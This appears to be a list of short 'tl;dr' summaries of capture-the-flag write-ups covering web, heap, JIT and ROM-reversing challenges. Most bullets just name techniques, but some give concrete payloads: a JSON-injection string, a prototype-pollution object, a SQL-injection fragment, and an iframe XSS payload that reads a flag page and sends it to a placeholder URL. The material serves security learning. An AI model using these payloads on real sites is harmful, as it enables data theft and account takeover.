tl;dr

• Notepad 1 - Use Set-Cookie header to get XSS on the Admin
• Notepad 1.5 - CRLF on the name parameter of Golang’s Header().Set() method
• Notepad 2 - Xsleaks using Timing-Allow-Origin header

tl;dr

• Jemalloc heap challenge
• A buggy implementation of strncat in merge allows for an overwrite onto the next region

tl;dr

• /source to get the source
• Access local host from dev_test using SSRF
• SQLI to get the flag path a nd LFI to get the flag

tl;dr

• Arbitrary type confusion in DFG JIT
• Bug eliminates a single CheckStructure node

tl;dr

• Json_Interoperability - /verify_roles?role=supersuperuseruser\ud800","name":"admin
• Prototype_Pollution - {"constructor":{"prototype":{"test":"123"}}} in config-handler

tl;dr

• Leak admin’s hash using wildcard target origin in postMessage or by calculating sha256('').
• Create an XSS payload to read /api/flag and send it to attacker server.

tl;dr

• Part-1: .bzr file retrival using any tool
• Part-1: exploiting ssrf via ffmpeg to read /flag file to a video and download it before it gets deleted

tl;dr

• SQLi - lcase('inKypinKy')id from dual
• Creating User - header("location:http://web/user.php?session=1111-22222-1234&sub=submit");
• Retrieving Flag - header("location:http://web/flag.php?session=<iframe id="a" src="http://web/flag.php?session=1111-22222-1234&sub=submit" onload=window.location="<URL>?"+btoa(document.getElementById('a').contentWindow.document.body.innerText)>&sub=submit")

tl;dr

• Challenge involves Reversing, Web, and Crypto
• Reverse the binary to get the endpoints
• Trigger the XSS bug in the website and get admin cookie
• Use Hash Length extension attack to get authenticated as admin and get the flag

tl;dr

• Challenge is a Nintendo GameBoy ROM image.
• Reverse the ROM and figure out the implementation
• Analyze the calling function’s checks to find the path along which we must move.